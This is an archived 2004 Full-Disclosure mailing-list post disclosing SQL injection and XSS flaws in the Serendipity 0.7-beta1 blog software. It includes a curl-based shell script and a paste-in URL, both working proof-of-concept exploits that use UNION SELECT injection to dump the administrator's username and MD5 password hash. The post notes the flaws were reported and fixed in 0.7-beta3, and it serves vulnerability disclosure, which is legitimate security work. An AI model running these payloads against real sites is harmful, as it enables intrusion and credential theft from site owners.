[Full-Disclosure] Serendipity 0.7-beta1 SQL Injection PoC

From: aCiDBiTS (acidbits_at_gmail.com)
Date: 09/28/04

  • Next message: Dave Horsfall: "Re: [Full-Disclosure] JPEG Virus" 
    To: full-disclosure@lists.netsys.com
Date: Tue, 28 Sep 2004 13:28:38 +0200

    Serendipity 0.7-beta1 SQL Injection Proof of Concept
    By aCiDBiTS acidbits@gmail.com 13-September-2004

            
    "Serendipity (http://www.s9y.org/) is a weblog/blog system,
    implemented with PHP. It is standards compliant, feature rich and open
    source (BSD License)."
            
    There is no user input sanitation for parameters entry_id in exit.php
    and comment.php prior being used in a SQL query. This can be exploited
    to manipulate SQL queries by injecting arbitrary SQL code. Comment.php
    is also prone to XSS through email and username post's fields.
    Serendipity 0.7-beta1 and older versions are vulnerable.

    Developer team had been notified 13-September-2004 and this
    vulnerabilities are fixed from Serendipity 0.7-beta3.
            
    These PoCs dumps admin's username and md5(password).

    Proof of Concept 1
    ------------------

    Usage: ./ser_sqli_poc.sh URL_to_Serendipity_Weblog

    ser_sqli_poc.sh
    ---------8<-----------8<-------------
    #!/bin/sh

    echo -n "Username: "
    curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20username%20from%20serendipity_authors%20where%20authorid%3D1"
    | grep Location | cut -b10-
    echo -n "MD5(password): "
    curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20password%20from%20serendipity_authors%20where%20authorid%3D1"
    | grep Location | cut -b10-
    ---------8<-----------8<-------------

    Proof of Concept 2
    ------------------

    Copy&Paste this to your browser and edit URL_to_Serendipity_Weblog.

    http://URL_to_Serendipity_Weblog/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/*

         \ /
          (Oo)
         //||\\

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Dave Horsfall: "Re: [Full-Disclosure] JPEG Virus"